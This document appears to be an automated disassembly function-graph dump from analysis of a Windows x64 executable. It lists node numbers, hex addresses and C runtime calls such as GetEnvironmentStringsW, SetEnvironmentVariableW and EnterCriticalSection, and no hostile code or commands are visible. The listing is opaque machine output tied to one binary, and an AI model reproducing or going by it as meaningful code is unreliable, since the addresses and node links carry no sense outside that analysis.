_get_daylight 11 API calls 17746->17749 17757 7ff7f3de4f4c 17747->17757 17752 7ff7f3dea8e0 _invalid_parameter_noinfo 37 API calls 17748->17752 17750 7ff7f3de5086 17749->17750 17754 7ff7f3dea8e0 _invalid_parameter_noinfo 37 API calls 17750->17754 17755 7ff7f3de5046 17752->17755 17753->17608 17756 7ff7f3de5091 17754->17756 17755->17608 17756->17608 17758 7ff7f3de4f70 17757->17758 17759 7ff7f3de4f6b 17757->17759 17758->17759 17760 7ff7f3deb150 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 17758->17760 17759->17756 17761 7ff7f3de4f8b 17760->17761 17765 7ff7f3ded984 17761->17765 17766 7ff7f3de4fae 17765->17766 17767 7ff7f3ded999 17765->17767 17769 7ff7f3ded9f0 17766->17769 17767->17766 17768 7ff7f3df3304 45 API calls 17767->17768 17768->17766 17774 7ff7f3dd4136 17773->17774 17775 7ff7f3de4984 49 API calls 17774->17775 17777 7ff7f3dd415c 17775->17777 17837 7ff7f3de5ec8 17836->17837 17838 7ff7f3de5eee 17837->17838 17841 7ff7f3de5f21 17837->17841 17839 7ff7f3de4f08 _get_daylight 11 API calls 17838->17839 17840 7ff7f3de5ef3 17839->17840 17842 7ff7f3dea8e0 _invalid_parameter_noinfo 37 API calls 17840->17842 17843 7ff7f3de5f34 17841->17843 17844 7ff7f3de5f27 17841->17844 17847 7ff7f3dd4616 17842->17847 17855 7ff7f3deac28 17843->17855 17845 7ff7f3de4f08 _get_daylight 11 API calls 17844->17845 17845->17847 17847->16362 17868 7ff7f3df02d8 EnterCriticalSection 17855->17868 18228 7ff7f3de78f8 18227->18228 18231 7ff7f3de73d4 18228->18231 18230 7ff7f3de7911 18230->16372 18232 7ff7f3de73ef 18231->18232 18233 7ff7f3de741e 18231->18233 18234 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 18232->18234 18241 7ff7f3de546c EnterCriticalSection 18233->18241 18236 7ff7f3de740f 18234->18236 18236->18230 18243 7ff7f3ddfe43 18242->18243 18245 7ff7f3ddfe71 18242->18245 18244 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 18243->18244 18246 7ff7f3ddfe63 18244->18246 18245->18246 18252 7ff7f3de546c EnterCriticalSection 18245->18252 18246->16376 18254 7ff7f3ddcaf2 RtlLookupFunctionEntry 18253->18254 18255 7ff7f3ddc90b 18254->18255 18256 7ff7f3ddcb08 RtlVirtualUnwind 18254->18256 18257 7ff7f3ddc8a0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 18255->18257 18256->18254 18256->18255 18259 7ff7f3dd45c0 108 API calls 18258->18259 18260 7ff7f3dd1493 18259->18260 18261 7ff7f3dd149b 18260->18261 18262 7ff7f3dd14bc 18260->18262 18263 7ff7f3dd2710 54 API calls 18261->18263 18264 7ff7f3de06d4 73 API calls 18262->18264 18265 7ff7f3dd14ab 18263->18265 18266 7ff7f3dd14d1 18264->18266 18265->16418 18267 7ff7f3dd14d5 18266->18267 18268 7ff7f3dd14f8 18266->18268 18269 7ff7f3de4f08 _get_daylight 11 API calls 18267->18269 18272 7ff7f3dd1532 18268->18272 18273 7ff7f3dd1508 18268->18273 18365 7ff7f3dd6375 18364->18365 18366 7ff7f3dd1c80 49 API calls 18365->18366 18367 7ff7f3dd63b1 18366->18367 18368 7ff7f3dd63dd 18367->18368 18369 7ff7f3dd63ba 18367->18369 18371 7ff7f3dd4630 49 API calls 18368->18371 18370 7ff7f3dd2710 54 API calls 18369->18370 18372 7ff7f3dd63d3 18370->18372 18373 7ff7f3dd63f5 18371->18373 18376 7ff7f3ddc550 _log10_special 8 API calls 18372->18376 18374 7ff7f3dd6413 18373->18374 18377 7ff7f3dd2710 54 API calls 18373->18377 18375 7ff7f3dd4560 10 API calls 18374->18375 18378 7ff7f3dd641d 18375->18378 18379 7ff7f3dd336e 18376->18379 18377->18374 18380 7ff7f3dd642b 18378->18380 18381 7ff7f3dd8e80 3 API calls 18378->18381 18379->16492 18395 7ff7f3dd6500 18379->18395 18382 7ff7f3dd4630 49 API calls 18380->18382 18381->18380 18544 7ff7f3dd5400 18395->18544 18654 7ff7f3deb150 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18653->18654 18656 7ff7f3dea3e1 18654->18656 18658 7ff7f3dea504 18656->18658 18667 7ff7f3df3650 18658->18667 18693 7ff7f3df3608 18667->18693 18698 7ff7f3df02d8 EnterCriticalSection 18693->18698 20496 7ff7f3ddcb50 20497 7ff7f3ddcb60 20496->20497 20513 7ff7f3de9ba8 20497->20513 20499 7ff7f3ddcb6c 20519 7ff7f3ddce48 20499->20519 20501 7ff7f3ddd12c 7 API calls 20503 7ff7f3ddcc05 20501->20503 20502 7ff7f3ddcb84 _RTC_Initialize 20511 7ff7f3ddcbd9 20502->20511 20524 7ff7f3ddcff8 20502->20524 20505 7ff7f3ddcb99 20527 7ff7f3de9014 20505->20527 20511->20501 20512 7ff7f3ddcbf5 20511->20512 20514 7ff7f3de9bb9 20513->20514 20515 7ff7f3de4f08 _get_daylight 11 API calls 20514->20515 20516 7ff7f3de9bc1 20514->20516 20517 7ff7f3de9bd0 20515->20517 20516->20499 20518 7ff7f3dea8e0 _invalid_parameter_noinfo 37 API calls 20517->20518 20518->20516 20520 7ff7f3ddce59 20519->20520 20521 7ff7f3ddce5e __scrt_release_startup_lock 20519->20521 20520->20521 20522 7ff7f3ddd12c 7 API calls 20520->20522 20521->20502 20523 7ff7f3ddced2 20522->20523 20552 7ff7f3ddcfbc 20524->20552 20526 7ff7f3ddd001 20526->20505 20528 7ff7f3de9034 20527->20528 20542 7ff7f3ddcba5 20527->20542 20529 7ff7f3de9052 GetModuleFileNameW 20528->20529 20530 7ff7f3de903c 20528->20530 20534 7ff7f3de907d 20529->20534 20531 7ff7f3de4f08 _get_daylight 11 API calls 20530->20531 20532 7ff7f3de9041 20531->20532 20533 7ff7f3dea8e0 _invalid_parameter_noinfo 37 API calls 20532->20533 20533->20542 20535 7ff7f3de8fb4 11 API calls 20534->20535 20536 7ff7f3de90bd 20535->20536 20537 7ff7f3de90c5 20536->20537 20541 7ff7f3de90dd 20536->20541 20538 7ff7f3de4f08 _get_daylight 11 API calls 20537->20538 20539 7ff7f3de90ca 20538->20539 20540 7ff7f3dea948 __free_lconv_num 11 API calls 20539->20540 20540->20542 20544 7ff7f3de912b 20541->20544 20546 7ff7f3de9144 20541->20546 20550 7ff7f3de90ff 20541->20550 20542->20511 20551 7ff7f3ddd0cc InitializeSListHead 20542->20551 20543 7ff7f3dea948 __free_lconv_num 11 API calls 20543->20542 20545 7ff7f3dea948 __free_lconv_num 11 API calls 20544->20545 20547 7ff7f3de9134 20545->20547 20546->20546 20548 7ff7f3dea948 __free_lconv_num 11 API calls 20546->20548 20549 7ff7f3dea948 __free_lconv_num 11 API calls 20547->20549 20548->20550 20549->20542 20550->20543 20553 7ff7f3ddcfd6 20552->20553 20555 7ff7f3ddcfcf 20552->20555 20556 7ff7f3dea1ec 20553->20556 20555->20526 20559 7ff7f3de9e28 20556->20559 20566 7ff7f3df02d8 EnterCriticalSection 20559->20566 20278 7ff7f3deafd0 20279 7ff7f3deafd5 20278->20279 20280 7ff7f3deafea 20278->20280 20284 7ff7f3deaff0 20279->20284 20285 7ff7f3deb032 20284->20285 20286 7ff7f3deb03a 20284->20286 20288 7ff7f3dea948 __free_lconv_num 11 API calls 20285->20288 20287 7ff7f3dea948 __free_lconv_num 11 API calls 20286->20287 20289 7ff7f3deb047 20287->20289 20288->20286 20290 7ff7f3dea948 __free_lconv_num 11 API calls 20289->20290 20291 7ff7f3deb054 20290->20291 20292 7ff7f3dea948 __free_lconv_num 11 API calls 20291->20292 20293 7ff7f3deb061 20292->20293 20294 7ff7f3dea948 __free_lconv_num 11 API calls 20293->20294 20295 7ff7f3deb06e 20294->20295 20296 7ff7f3dea948 __free_lconv_num 11 API calls 20295->20296 20297 7ff7f3deb07b 20296->20297 20298 7ff7f3dea948 __free_lconv_num 11 API calls 20297->20298 20299 7ff7f3deb088 20298->20299 20300 7ff7f3dea948 __free_lconv_num 11 API calls 20299->20300 20301 7ff7f3deb095 20300->20301 20302 7ff7f3dea948 __free_lconv_num 11 API calls 20301->20302 20303 7ff7f3deb0a5 20302->20303 20304 7ff7f3dea948 __free_lconv_num 11 API calls 20303->20304 20305 7ff7f3deb0b5 20304->20305 20310 7ff7f3deae94 20305->20310 20324 7ff7f3df02d8 EnterCriticalSection 20310->20324 20567 7ff7f3de9d50 20570 7ff7f3de9ccc 20567->20570 20577 7ff7f3df02d8 EnterCriticalSection 20570->20577 18815 7ff7f3df08c8 18816 7ff7f3df08ec 18815->18816 18819 7ff7f3df08fc 18815->18819 18817 7ff7f3de4f08 _get_daylight 11 API calls 18816->18817 18818 7ff7f3df08f1 18817->18818 18820 7ff7f3df0bdc 18819->18820 18822 7ff7f3df091e 18819->18822 18821 7ff7f3de4f08 _get_daylight 11 API calls 18820->18821 18823 7ff7f3df0be1 18821->18823 18824 7ff7f3df093f 18822->18824 18946 7ff7f3df0f84 18822->18946 18825 7ff7f3dea948 __free_lconv_num 11 API calls 18823->18825 18827 7ff7f3df09b1 18824->18827 18828 7ff7f3df0965 18824->18828 18844 7ff7f3df09a5 18824->18844 18825->18818 18830 7ff7f3deeb98 _get_daylight 11 API calls 18827->18830 18833 7ff7f3df0974 18827->18833 18961 7ff7f3de96c0 18828->18961 18834 7ff7f3df09c7 18830->18834 18832 7ff7f3df0a5e 18840 7ff7f3df0a7b 18832->18840 18846 7ff7f3df0acd 18832->18846 18836 7ff7f3dea948 __free_lconv_num 11 API calls 18833->18836 18837 7ff7f3dea948 __free_lconv_num 11 API calls 18834->18837 18836->18818 18841 7ff7f3df09d5 18837->18841 18838 7ff7f3df096f 18842 7ff7f3de4f08 _get_daylight 11 API calls 18838->18842 18839 7ff7f3df098d 18839->18844 18845 7ff7f3df0f84 45 API calls 18839->18845 18843 7ff7f3dea948 __free_lconv_num 11 API calls 18840->18843 18841->18833 18841->18844 18849 7ff7f3deeb98 _get_daylight 11 API calls 18841->18849 18842->18833 18847 7ff7f3df0a84 18843->18847 18844->18832 18844->18833 18967 7ff7f3df712c 18844->18967 18845->18844 18846->18833 18848 7ff7f3df33dc 40 API calls 18846->18848 18856 7ff7f3df0a89 18847->18856 19003 7ff7f3df33dc 18847->19003 18850 7ff7f3df0b0a 18848->18850 18852 7ff7f3df09f7 18849->18852 18853 7ff7f3dea948 __free_lconv_num 11 API calls 18850->18853 18858 7ff7f3dea948 __free_lconv_num 11 API calls 18852->18858 18854 7ff7f3df0b14 18853->18854 18854->18833 18854->18856 18855 7ff7f3df0bd0 18860 7ff7f3dea948 __free_lconv_num 11 API calls 18855->18860 18856->18855 18861 7ff7f3deeb98 _get_daylight 11 API calls 18856->18861 18857 7ff7f3df0ab5 18859 7ff7f3dea948 __free_lconv_num 11 API calls 18857->18859 18858->18844 18859->18856 18860->18818 18862 7ff7f3df0b58 18861->18862 18863 7ff7f3df0b60 18862->18863 18864 7ff7f3df0b69 18862->18864 18865 7ff7f3dea948 __free_lconv_num 11 API calls 18863->18865 18866 7ff7f3dea4a4 __std_exception_copy 37 API calls 18864->18866 18867 7ff7f3df0b67 18865->18867 18868 7ff7f3df0b78 18866->18868 18873 7ff7f3dea948 __free_lconv_num 11 API calls 18867->18873 18869 7ff7f3df0b80 18868->18869 18870 7ff7f3df0c0b 18868->18870 19012 7ff7f3df7244 18869->19012 18872 7ff7f3dea900 _isindst 17 API calls 18870->18872 18875 7ff7f3df0c1f 18872->18875 18873->18818 18878 7ff7f3df0c48 18875->18878 18884 7ff7f3df0c58 18875->18884 18876 7ff7f3df0ba7 18879 7ff7f3de4f08 _get_daylight 11 API calls 18876->18879 18877 7ff7f3df0bc8 18881 7ff7f3dea948 __free_lconv_num 11 API calls 18877->18881 18880 7ff7f3de4f08 _get_daylight 11 API calls 18878->18880 18882 7ff7f3df0bac 18879->18882 18908 7ff7f3df0c4d 18880->18908 18881->18855 18883 7ff7f3dea948 __free_lconv_num 11 API calls 18882->18883 18883->18867 18885 7ff7f3df0f3b 18884->18885 18887 7ff7f3df0c7a 18884->18887 18886 7ff7f3de4f08 _get_daylight 11 API calls 18885->18886 18889 7ff7f3df0f40 18886->18889 18888 7ff7f3df0c97 18887->18888 19031 7ff7f3df106c 18887->19031 18892 7ff7f3df0d0b 18888->18892 18894 7ff7f3df0cbf 18888->18894 18898 7ff7f3df0cff 18888->18898 18891 7ff7f3dea948 __free_lconv_num 11 API calls 18889->18891 18891->18908 18896 7ff7f3df0d33 18892->18896 18899 7ff7f3deeb98 _get_daylight 11 API calls 18892->18899 18915 7ff7f3df0cce 18892->18915 18893 7ff7f3df0dbe 18907 7ff7f3df0ddb 18893->18907 18916 7ff7f3df0e2e 18893->18916 19046 7ff7f3de96fc 18894->19046 18896->18898 18901 7ff7f3deeb98 _get_daylight 11 API calls 18896->18901 18896->18915 18898->18893 18898->18915 19052 7ff7f3df6fec 18898->19052 18903 7ff7f3df0d25 18899->18903 18906 7ff7f3df0d55 18901->18906 18902 7ff7f3dea948 __free_lconv_num 11 API calls 18902->18908 18909 7ff7f3dea948 __free_lconv_num 11 API calls 18903->18909 18904 7ff7f3df0cc9 18910 7ff7f3de4f08 _get_daylight 11 API calls 18904->18910 18905 7ff7f3df0ce7 18905->18898 18914 7ff7f3df106c 45 API calls 18905->18914 18911 7ff7f3dea948 __free_lconv_num 11 API calls 18906->18911 18912 7ff7f3dea948 __free_lconv_num 11 API calls 18907->18912 18909->18896 18910->18915 18911->18898 18913 7ff7f3df0de4 18912->18913 18920 7ff7f3df33dc 40 API calls 18913->18920 18923 7ff7f3df0dea 18913->18923 18914->18898 18915->18902 18916->18915 18917 7ff7f3df33dc 40 API calls 18916->18917 18918 7ff7f3df0e6c 18917->18918 18919 7ff7f3dea948 __free_lconv_num 11 API calls 18918->18919 18921 7ff7f3df0e76 18919->18921 18924 7ff7f3df0e16 18920->18924 18921->18915 18921->18923 18922 7ff7f3df0f2f 18926 7ff7f3dea948 __free_lconv_num 11 API calls 18922->18926 18923->18922 18927 7ff7f3deeb98 _get_daylight 11 API calls 18923->18927 18925 7ff7f3dea948 __free_lconv_num 11 API calls 18924->18925 18925->18923 18926->18908 18928 7ff7f3df0ebb 18927->18928 18929 7ff7f3df0ec3 18928->18929 18930 7ff7f3df0ecc 18928->18930 18931 7ff7f3dea948 __free_lconv_num 11 API calls 18929->18931 18932 7ff7f3df0474 37 API calls 18930->18932 18934 7ff7f3df0eca 18931->18934 18933 7ff7f3df0eda 18932->18933 18935 7ff7f3df0ee2 SetEnvironmentVariableW 18933->18935 18936 7ff7f3df0f6f 18933->18936 18940 7ff7f3dea948 __free_lconv_num 11 API calls 18934->18940 18937 7ff7f3df0f06 18935->18937 18938 7ff7f3df0f27 18935->18938 18939 7ff7f3dea900 _isindst 17 API calls 18936->18939 18941 7ff7f3de4f08 _get_daylight 11 API calls 18937->18941 18943 7ff7f3dea948 __free_lconv_num 11 API calls 18938->18943 18942 7ff7f3df0f83 18939->18942 18940->18908 18944 7ff7f3df0f0b 18941->18944 18943->18922 18945 7ff7f3dea948 __free_lconv_num 11 API calls 18944->18945 18945->18934 18947 7ff7f3df0fa1 18946->18947 18948 7ff7f3df0fb9 18946->18948 18947->18824 18949 7ff7f3deeb98 _get_daylight 11 API calls 18948->18949 18956 7ff7f3df0fdd 18949->18956 18950 7ff7f3df1062 18952 7ff7f3dea504 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18950->18952 18951 7ff7f3df103e 18953 7ff7f3dea948 __free_lconv_num 11 API calls 18951->18953 18954 7ff7f3df1068 18952->18954 18953->18947 18955 7ff7f3deeb98 _get_daylight 11 API calls 18955->18956 18956->18950 18956->18951 18956->18955 18957 7ff7f3dea948 __free_lconv_num 11 API calls 18956->18957 18958 7ff7f3dea4a4 __std_exception_copy 37 API calls 18956->18958 18959 7ff7f3df104d 18956->18959 18957->18956 18958->18956 18960 7ff7f3dea900 _isindst 17 API calls 18959->18960 18960->18950 18962 7ff7f3de96d0 18961->18962 18965 7ff7f3de96d9 18961->18965 18962->18965 19076 7ff7f3de9198 18962->19076 18965->18838 18965->18839 18968 7ff7f3df6254 18967->18968 18969 7ff7f3df7139 18967->18969 18970 7ff7f3df6261 18968->18970 18976 7ff7f3df6297 18968->18976 18971 7ff7f3de4f4c 45 API calls 18969->18971 18974 7ff7f3de4f08 _get_daylight 11 API calls 18970->18974 18989 7ff7f3df6208 18970->18989 18973 7ff7f3df716d 18971->18973 18972 7ff7f3df62c1 18975 7ff7f3de4f08 _get_daylight 11 API calls 18972->18975 18979 7ff7f3df7183 18973->18979 18983 7ff7f3df719a 18973->18983 18999 7ff7f3df7172 18973->18999 18977 7ff7f3df626b 18974->18977 18978 7ff7f3df62c6 18975->18978 18976->18972 18980 7ff7f3df62e6 18976->18980 18981 7ff7f3dea8e0 _invalid_parameter_noinfo 37 API calls 18977->18981 18982 7ff7f3dea8e0 _invalid_parameter_noinfo 37 API calls 18978->18982 18985 7ff7f3de4f08 _get_daylight 11 API calls 18979->18985 18984 7ff7f3df62d1 18980->18984 18990 7ff7f3de4f4c 45 API calls 18980->18990 18986 7ff7f3df6276 18981->18986 18982->18984 18987 7ff7f3df71b6 18983->18987 18988 7ff7f3df71a4 18983->18988 18984->18844 18991 7ff7f3df7188 18985->18991 18986->18844 18993 7ff7f3df71de 18987->18993 18994 7ff7f3df71c7 18987->18994 18992 7ff7f3de4f08 _get_daylight 11 API calls 18988->18992 18989->18844 18990->18984 18995 7ff7f3dea8e0 _invalid_parameter_noinfo 37 API calls 18991->18995 18996 7ff7f3df71a9 18992->18996 19317 7ff7f3df8f4c 18993->19317 19308 7ff7f3df62a4 18994->19308 18995->18999 19000 7ff7f3dea8e0 _invalid_parameter_noinfo 37 API calls 18996->19000 18999->18844 19000->18999 19002 7ff7f3de4f08 _get_daylight 11 API calls 19002->18999 19004 7ff7f3df33fe 19003->19004 19005 7ff7f3df341b 19003->19005 19004->19005 19006 7ff7f3df340c 19004->19006 19007 7ff7f3df3425 19005->19007 19357 7ff7f3df7c38 19005->19357 19008 7ff7f3de4f08 _get_daylight 11 API calls 19006->19008 19364 7ff7f3df7c74 19007->19364 19011 7ff7f3df3411 __scrt_get_show_window_mode 19008->19011 19011->18857 19013 7ff7f3de4f4c 45 API calls 19012->19013 19014 7ff7f3df72aa 19013->19014 19016 7ff7f3df72b8 19014->19016 19376 7ff7f3deef24 19014->19376 19379 7ff7f3de54ac 19016->19379 19019 7ff7f3df73a4 19022 7ff7f3df73b5 19019->19022 19023 7ff7f3dea948 __free_lconv_num 11 API calls 19019->19023 19020 7ff7f3de4f4c 45 API calls 19021 7ff7f3df7327 19020->19021 19025 7ff7f3deef24 5 API calls 19021->19025 19028 7ff7f3df7330 19021->19028 19024 7ff7f3df0ba3 19022->19024 19026 7ff7f3dea948 __free_lconv_num 11 API calls 19022->19026 19023->19022 19024->18876 19024->18877 19025->19028 19026->19024 19027 7ff7f3de54ac 14 API calls 19029 7ff7f3df738b 19027->19029 19028->19027 19029->19019 19030 7ff7f3df7393 SetEnvironmentVariableW 19029->19030 19030->19019 19032 7ff7f3df108f 19031->19032 19033 7ff7f3df10ac 19031->19033 19032->18888 19034 7ff7f3deeb98 _get_daylight 11 API calls 19033->19034 19039 7ff7f3df10d0 19034->19039 19035 7ff7f3df1131 19037 7ff7f3dea948 __free_lconv_num 11 API calls 19035->19037 19036 7ff7f3dea504 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 19038 7ff7f3df115a 19036->19038 19037->19032 19039->19035 19040 7ff7f3deeb98 _get_daylight 11 API calls 19039->19040 19041 7ff7f3dea948 __free_lconv_num 11 API calls 19039->19041 19042 7ff7f3df0474 37 API calls 19039->19042 19043 7ff7f3df1140 19039->19043 19045 7ff7f3df1154 19039->19045 19040->19039 19041->19039 19042->19039 19044 7ff7f3dea900 _isindst 17 API calls 19043->19044 19044->19045 19045->19036 19047 7ff7f3de9715 19046->19047 19048 7ff7f3de970c 19046->19048 19047->18904 19047->18905 19048->19047 19401 7ff7f3de920c 19048->19401 19053 7ff7f3df6ff9 19052->19053 19057 7ff7f3df7026 19052->19057 19054 7ff7f3df6ffe 19053->19054 19053->19057 19055 7ff7f3de4f08 _get_daylight 11 API calls 19054->19055 19056 7ff7f3df7003 19055->19056 19060 7ff7f3dea8e0 _invalid_parameter_noinfo 37 API calls 19056->19060 19058 7ff7f3df706a 19057->19058 19061 7ff7f3df7089 19057->19061 19074 7ff7f3df705e __crtLCMapStringW 19057->19074 19059 7ff7f3de4f08 _get_daylight 11 API calls 19058->19059 19062 7ff7f3df706f 19059->19062 19063 7ff7f3df700e 19060->19063 19064 7ff7f3df70a5 19061->19064 19065 7ff7f3df7093 19061->19065 19066 7ff7f3dea8e0 _invalid_parameter_noinfo 37 API calls 19062->19066 19063->18898 19068 7ff7f3de4f4c 45 API calls 19064->19068 19067 7ff7f3de4f08 _get_daylight 11 API calls 19065->19067 19066->19074 19069 7ff7f3df7098 19067->19069 19070 7ff7f3df70b2 19068->19070 19071 7ff7f3dea8e0 _invalid_parameter_noinfo 37 API calls 19069->19071 19070->19074 19448 7ff7f3df8b08 19070->19448 19071->19074 19074->18898 19075 7ff7f3de4f08 _get_daylight 11 API calls 19075->19074 19077 7ff7f3de91b1 19076->19077 19087 7ff7f3de91ad 19076->19087 19099 7ff7f3df25f0 19077->19099 19082 7ff7f3de91c3 19085 7ff7f3dea948 __free_lconv_num 11 API calls 19082->19085 19083 7ff7f3de91cf 19125 7ff7f3de927c 19083->19125 19085->19087 19087->18965 19091 7ff7f3de94ec 19087->19091 19088 7ff7f3dea948 __free_lconv_num 11 API calls 19089 7ff7f3de91f6 19088->19089 19090 7ff7f3dea948 __free_lconv_num 11 API calls 19089->19090 19090->19087 19092 7ff7f3de9515 19091->19092 19095 7ff7f3de952e 19091->19095 19092->18965 19093 7ff7f3df07e8 WideCharToMultiByte 19093->19095 19094 7ff7f3deeb98 _get_daylight 11 API calls 19094->19095 19095->19092 19095->19093 19095->19094 19096 7ff7f3de95be 19095->19096 19098 7ff7f3dea948 __free_lconv_num 11 API calls 19095->19098 19097 7ff7f3dea948 __free_lconv_num 11 API calls 19096->19097 19097->19092 19098->19095 19100 7ff7f3df25fd 19099->19100 19101 7ff7f3de91b6 19099->19101 19144 7ff7f3deb224 19100->19144 19105 7ff7f3df292c GetEnvironmentStringsW 19101->19105 19106 7ff7f3de91bb 19105->19106 19107 7ff7f3df295c 19105->19107 19106->19082 19106->19083 19108 7ff7f3df07e8 WideCharToMultiByte 19107->19108 19109 7ff7f3df29ad 19108->19109 19110 7ff7f3df29b4 FreeEnvironmentStringsW 19109->19110 19111 7ff7f3ded5fc _fread_nolock 12 API calls 19109->19111 19110->19106 19112 7ff7f3df29c7 19111->19112 19113 7ff7f3df29cf 19112->19113 19114 7ff7f3df29d8 19112->19114 19115 7ff7f3dea948 __free_lconv_num 11 API calls 19113->19115 19116 7ff7f3df07e8 WideCharToMultiByte 19114->19116 19117 7ff7f3df29d6 19115->19117 19118 7ff7f3df29fb 19116->19118 19117->19110 19119 7ff7f3df29ff 19118->19119 19120 7ff7f3df2a09 19118->19120 19121 7ff7f3dea948 __free_lconv_num 11 API calls 19119->19121 19122 7ff7f3dea948 __free_lconv_num 11 API calls 19120->19122 19123 7ff7f3df2a07 FreeEnvironmentStringsW 19121->19123 19122->19123 19123->19106 19126 7ff7f3de92a1 19125->19126 19127 7ff7f3deeb98 _get_daylight 11 API calls 19126->19127 19128 7ff7f3de92d7 19127->19128 19130 7ff7f3de9352 19128->19130 19133 7ff7f3deeb98 _get_daylight 11 API calls 19128->19133 19134 7ff7f3de9341 19128->19134 19135 7ff7f3dea4a4 __std_exception_copy 37 API calls 19128->19135 19139 7ff7f3de9377 19128->19139 19140 7ff7f3de92df 19128->19140 19142 7ff7f3dea948 __free_lconv_num 11 API calls 19128->19142 19129 7ff7f3dea948 __free_lconv_num 11 API calls 19132 7ff7f3de91d7 19129->19132 19131 7ff7f3dea948 __free_lconv_num 11 API calls 19130->19131 19131->19132 19132->19088 19133->19128 19302 7ff7f3de94a8 19134->19302 19135->19128 19138 7ff7f3dea948 __free_lconv_num 11 API calls 19138->19140 19141 7ff7f3dea900 _isindst 17 API calls 19139->19141 19140->19129 19143 7ff7f3de938a 19141->19143 19142->19128 19145 7ff7f3deb235 FlsGetValue 19144->19145 19146 7ff7f3deb250 FlsSetValue 19144->19146 19147 7ff7f3deb242 19145->19147 19148 7ff7f3deb24a 19145->19148 19146->19147 19149 7ff7f3deb25d 19146->19149 19150 7ff7f3deb248 19147->19150 19151 7ff7f3dea504 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 19147->19151 19148->19146 19152 7ff7f3deeb98 _get_daylight 11 API calls 19149->19152 19164 7ff7f3df22c4 19150->19164 19153 7ff7f3deb2c5 19151->19153 19154 7ff7f3deb26c 19152->19154 19155 7ff7f3deb28a FlsSetValue 19154->19155 19156 7ff7f3deb27a FlsSetValue 19154->19156 19158 7ff7f3deb296 FlsSetValue 19155->19158 19159 7ff7f3deb2a8 19155->19159 19157 7ff7f3deb283 19156->19157 19160 7ff7f3dea948 __free_lconv_num 11 API calls 19157->19160 19158->19157 19161 7ff7f3deaef4 _get_daylight 11 API calls 19159->19161 19160->19147 19162 7ff7f3deb2b0 19161->19162 19163 7ff7f3dea948 __free_lconv_num 11 API calls 19162->19163 19163->19150 19187 7ff7f3df2534 19164->19187 19166 7ff7f3df22f9 19202 7ff7f3df1fc4 19166->19202 19169 7ff7f3df2316 19169->19101 19170 7ff7f3ded5fc _fread_nolock 12 API calls 19171 7ff7f3df2327 19170->19171 19172 7ff7f3df232f 19171->19172 19174 7ff7f3df233e 19171->19174 19173 7ff7f3dea948 __free_lconv_num 11 API calls 19172->19173 19173->19169 19174->19174 19209 7ff7f3df266c 19174->19209 19177 7ff7f3df243a 19178 7ff7f3de4f08 _get_daylight 11 API calls 19177->19178 19180 7ff7f3df243f 19178->19180 19179 7ff7f3df2495 19182 7ff7f3df24fc 19179->19182 19220 7ff7f3df1df4 19179->19220 19183 7ff7f3dea948 __free_lconv_num 11 API calls 19180->19183 19181 7ff7f3df2454 19181->19179 19184 7ff7f3dea948 __free_lconv_num 11 API calls 19181->19184 19186 7ff7f3dea948 __free_lconv_num 11 API calls 19182->19186 19183->19169 19184->19179 19186->19169 19188 7ff7f3df2557 19187->19188 19189 7ff7f3df2561 19188->19189 19235 7ff7f3df02d8 EnterCriticalSection 19188->19235 19192 7ff7f3df25d3 19189->19192 19194 7ff7f3dea504 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 19189->19194 19192->19166 19196 7ff7f3df25eb 19194->19196 19197 7ff7f3df2642 19196->19197 19199 7ff7f3deb224 50 API calls 19196->19199 19197->19166 19200 7ff7f3df262c 19199->19200 19201 7ff7f3df22c4 65 API calls 19200->19201 19201->19197 19203 7ff7f3de4f4c 45 API calls 19202->19203 19204 7ff7f3df1fd8 19203->19204 19205 7ff7f3df1ff6 19204->19205 19206 7ff7f3df1fe4 GetOEMCP 19204->19206 19207 7ff7f3df200b 19205->19207 19208 7ff7f3df1ffb GetACP 19205->19208 19206->19207 19207->19169 19207->19170 19208->19207 19210 7ff7f3df1fc4 47 API calls 19209->19210 19211 7ff7f3df2699 19210->19211 19212 7ff7f3df27ef 19211->19212 19214 7ff7f3df26d6 IsValidCodePage 19211->19214 19219 7ff7f3df26f0 __scrt_get_show_window_mode 19211->19219 19213 7ff7f3ddc550 _log10_special 8 API calls 19212->19213 19215 7ff7f3df2431 19213->19215 19214->19212 19216 7ff7f3df26e7 19214->19216 19215->19177 19215->19181 19217 7ff7f3df2716 GetCPInfo 19216->19217 19216->19219 19217->19212 19217->19219 19236 7ff7f3df20dc 19219->19236 19301 7ff7f3df02d8 EnterCriticalSection 19220->19301 19237 7ff7f3df2119 GetCPInfo 19236->19237 19238 7ff7f3df220f 19236->19238 19237->19238 19243 7ff7f3df212c 19237->19243 19239 7ff7f3ddc550 _log10_special 8 API calls 19238->19239 19240 7ff7f3df22ae 19239->19240 19240->19212 19241 7ff7f3df2e40 48 API calls 19242 7ff7f3df21a3 19241->19242 19247 7ff7f3df7b84 19242->19247 19243->19241 19246 7ff7f3df7b84 54 API calls 19246->19238 19248 7ff7f3de4f4c 45 API calls 19247->19248 19249 7ff7f3df7ba9 19248->19249 19252 7ff7f3df7850 19249->19252 19253 7ff7f3df7891 19252->19253 19254 7ff7f3def8a0 _fread_nolock MultiByteToWideChar 19253->19254 19258 7ff7f3df78db 19254->19258 19255 7ff7f3df7b59 19257 7ff7f3ddc550 _log10_special 8 API calls 19255->19257 19256 7ff7f3df7a11 19256->19255 19261 7ff7f3dea948 __free_lconv_num 11 API calls 19256->19261 19259 7ff7f3df21d6 19257->19259 19258->19255 19258->19256 19260 7ff7f3ded5fc _fread_nolock 12 API calls 19258->19260 19262 7ff7f3df7913 19258->19262 19259->19246 19260->19262 19261->19255 19262->19256 19263 7ff7f3def8a0 _fread_nolock MultiByteToWideChar 19262->19263 19264 7ff7f3df7986 19263->19264 19264->19256 19283 7ff7f3def0e4 19264->19283 19267 7ff7f3df79d1 19267->19256 19269 7ff7f3def0e4 __crtLCMapStringW 6 API calls 19267->19269 19268 7ff7f3df7a22 19270 7ff7f3ded5fc _fread_nolock 12 API calls 19268->19270 19271 7ff7f3df7af4 19268->19271 19273 7ff7f3df7a40 19268->19273 19269->19256 19270->19273 19271->19256 19272 7ff7f3dea948 __free_lconv_num 11 API calls 19271->19272 19272->19256 19273->19256 19274 7ff7f3def0e4 __crtLCMapStringW 6 API calls 19273->19274 